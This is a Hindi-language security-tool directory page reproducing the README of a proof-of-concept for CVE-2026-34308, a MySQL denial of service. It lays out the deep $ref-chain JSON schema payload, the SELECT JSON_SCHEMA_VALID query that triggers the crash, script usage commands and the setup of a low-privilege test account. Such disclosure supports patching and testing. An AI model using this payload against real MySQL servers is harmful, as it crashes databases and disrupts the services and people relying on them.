Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-34308 — # CVE-2026-34308 के लिए प्रूफ-ऑफ-कॉन्सेप्ट MySQL Server JSON घटक में एक डिनायल-ऑफ-सर्विस (DoS) भेद्यता। JSON_SCHEMA_VALID() में गहरी $ref श्रृंखलाओं के माध्यम से स्टैक थकावट (stack exhaustion) प्रदर्शित करता है, जिससे सर्वर क्रैश हो जाता है। इसमें Python PoC स्क्रिप्ट और तकनीकी विश्लेषण शामिल है। | Kitploit
उपकरण/GitHubGitHub/joakimbulow/cve-2026-34308
भेद्यता विश्लेषणशोषणपेनिट्रेशन टेस्टिंगडेटाबेस सुरक्षा
GitHubjoakimbulow/cve-2026-34308

CVE-2026-34308

रिपॉजिटरी देखें
3 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →

विवरण

# CVE-2026-34308 के लिए प्रूफ-ऑफ-कॉन्सेप्ट MySQL Server JSON घटक में एक डिनायल-ऑफ-सर्विस (DoS) भेद्यता। JSON_SCHEMA_VALID() में गहरी $ref श्रृंखलाओं के माध्यम से स्टैक थकावट (stack exhaustion) प्रदर्शित करता है, जिससे सर्वर क्रैश हो जाता है। इसमें Python PoC स्क्रिप्ट और तकनीकी विश्लेषण शामिल है।

साझा करें

CVE-2026-34308: MySQL सर्वर (JSON घटक) सेवा अस्वीकार (Denial of Service)

आधिकारिक विक्रेता बुलेटिन: Oracle क्रिटिकल पैच अपडेट सलाह — अप्रैल 2026.

सारांश (प्रकाशित CVE से)

Oracle MySQL सर्वर में भेद्यता (घटक: सर्वर: JSON)।

समर्थित प्रभावित संस्करण: 8.0.0–8.0.45, 8.4.0–8.4.8, और 9.0.0–9.6.0।

यह भेद्यता कम-विशेषाधिकार वाले उपयोगकर्ता को MySQL सर्वर को क्रैश करने की अनुमति देती है।

CVSS 3.1 बेस स्कोर: 6.5 (केवल उपलब्धता पर प्रभाव)
CVSS वेक्टर: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H


अतिरिक्त तकनीकी विश्लेषण (CVE पाठ का हिस्सा नहीं)

देखा गया तंत्र: गहरी पुनरावृत्ति (deep recursion) जब MySQL एक JSON स्कीमा के विरुद्ध JSON_SCHEMA_VALID() का मूल्यांकन करता है जिसमें $ref पॉइंटर्स की एक लंबी रैखिक श्रृंखला होती है, बिना स्कीमा संकलन/सत्यापन के दौरान प्रभावी गहराई सीमा (depth cap) के—जिससे स्टैक समाप्ति (stack exhaustion) और हैंग या बार-बार क्रैश होता है।

कॉल श्रृंखला (अवधारणात्मक):

root@kitploit:~
Client SQL → JSON_SCHEMA_VALID(schema, instance)
  → आंतरिक JSON स्कीमा सत्यापन → बार-बार $ref समाधान
  → स्टैक समाप्ति → हैंग / क्रैश

आवश्यक विशेषाधिकार

इस PoC के लिए, कोई भी प्रमाणित MySQL खाता पर्याप्त है: केवल *.* पर USAGE अनुदान दें (MySQL का न्यूनतम विशेषाधिकार—कनेक्ट करने की क्षमता—बिना SELECT, तालिका पहुंच, या व्यवस्थापक भूमिकाओं के)। यदि उपयोगकर्ता एक सत्र खोल सकता है और SELECT JSON_SCHEMA_VALID(...) चला सकता है, तो वे स्थिति को ट्रिगर कर सकते हैं।


प्रमाण-अवधारणा (Proof of Concept)

PoC स्क्रिप्ट: poc_schema_dos.py

एक रैखिक $ref श्रृंखला (उदाहरण गहराई 1200) के साथ एक JSON स्कीमा बनाता है:

root@kitploit:~
{
  "$ref": "#/definitions/l0",
  "definitions": {
    "l0": {"$ref": "#/definitions/l1"},
    "l1": {"$ref": "#/definitions/l2"},
    ...
    "l1200": {"type": "string"}
  }
}

MySQL को भेजा गया: SELECT JSON_SCHEMA_VALID('<schema>', '"x"');

कमजोर बिल्ड्स के विरुद्ध परीक्षण में, यह लगभग एक सेकंड के भीतर सर्वर को क्रैश करते हुए देखा गया है (सटीक समय हार्डवेयर, बिल्ड फ्लैग्स और स्कीमा गहराई पर निर्भर करता है)।

उपयोग

root@kitploit:~
python3 poc_schema_dos.py --host 127.0.0.1 --port 3306 --user root --password ""

कम-विशेषाधिकार खाते का परीक्षण करने के लिए:

root@kitploit:~
CREATE USER 'test'@'%' IDENTIFIED BY 'password';
GRANT USAGE ON *.* TO 'test'@'%';
FLUSH PRIVILEGES;

फिर: python3 poc_schema_dos.py --user test --password password


CVSS v3.1 (आधिकारिक वेक्टर)

6.5 — AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

  • AV:N: नेटवर्क से सुलभ
  • AC:L: हमले की जटिलता कम
  • PR:L: कम विशेषाधिकार आवश्यक
  • UI:N: कोई उपयोगकर्ता सहभागिता नहीं
  • S:U: दायरा अपरिवर्तित
  • C:N / I:N: कोई गोपनीयता या अखंडता प्रभाव नहीं
  • A:H: उपलब्धता पर उच्च प्रभाव (हैंग / बार-बार क्रैश / DoS)

फ़ाइलें

  • poc_schema_dos.py: प्रमाण-अवधारणा स्क्रिप्ट
  • README.md: यह फ़ाइल
टूल डाउनलोड करें